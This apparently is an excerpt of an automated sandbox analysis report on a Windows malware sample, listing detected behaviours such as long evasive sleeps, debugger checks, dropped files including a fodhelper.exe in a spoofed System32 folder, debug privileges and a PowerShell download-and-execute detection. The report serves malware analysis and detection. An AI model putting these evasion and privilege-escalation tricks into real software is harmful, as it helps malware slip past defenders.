Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9939 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9895 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9798 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9858 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Windows \System32\fodhelper.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\_kjfech8_V.exe (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\exe.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\MSVCR100.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\WebView2Loader.dll (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\WebView2Loader.txt Jump to dropped file
Found large amount of non-executed APIs
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe API coverage: 0.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080 Thread sleep count: 9939 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004 Thread sleep count: 9895 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4384 Thread sleep count: 9858 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCEFE1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDD0F84
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDD0B33
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose, 9_2_6FDCCA9B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose, 9_2_6FDCC775
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDD0702
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson, 9_2_6FDCDF35
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCFD86
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FD97C6D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode, 9_2_6FDCDA38
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCF8B5
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson, 9_2_6FDCD4FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCF40B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCEFE1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDD0F84
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDD0B33
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose, 11_2_6FDCCA9B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose, 11_2_6FDCC775
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDD0702
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson, 11_2_6FDCDF35
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCFD86
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FD97C6D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode, 11_2_6FDCDA38
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCF8B5
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson, 11_2_6FDCD4FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCF40B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDF6C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_6FDF6C74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: curl.exe, 00000002.00000003.29379278870.000001AA88AA3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.29379756087.000001AA88AA3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.29379139326.000001AA88AA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process queried: DebugPort Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_00D01000 getenv,printf,printf,__argc,__argv,printf,__argc,GetCommandLineA,JLI_CmdToArgs,JLI_GetStdArgc,JLI_MemAlloc,JLI_GetStdArgs,LdrInitializeThunk,JLI_Launch, 11_2_00D01000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 9_2_00D017CE
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDF6C74 VirtualProtect ?,-00000001,00000104,? 9_2_6FDF6C74
Contains functionality to dynamically determine API calls
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDFB67F _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 9_2_6FDFB67F
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDF9C3F GetProcessHeap,HeapAlloc,_errno,_errno,GetProcessHeap,HeapFree,__doserrno,_errno,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError, 9_2_6FDF9C3F
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 9_2_00D017CE
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDFADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook, 9_2_6FDFADFC
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD80807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 9_2_6FD80807
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDFC16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 9_2_6FDFC16F
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 11_2_00D017CE
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDFADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook, 11_2_6FDFADFC
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD80807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 11_2_6FD80807
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDFC16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 11_2_6FDFC16F

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_6872.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_7380.amsi.csv, type: OTHER
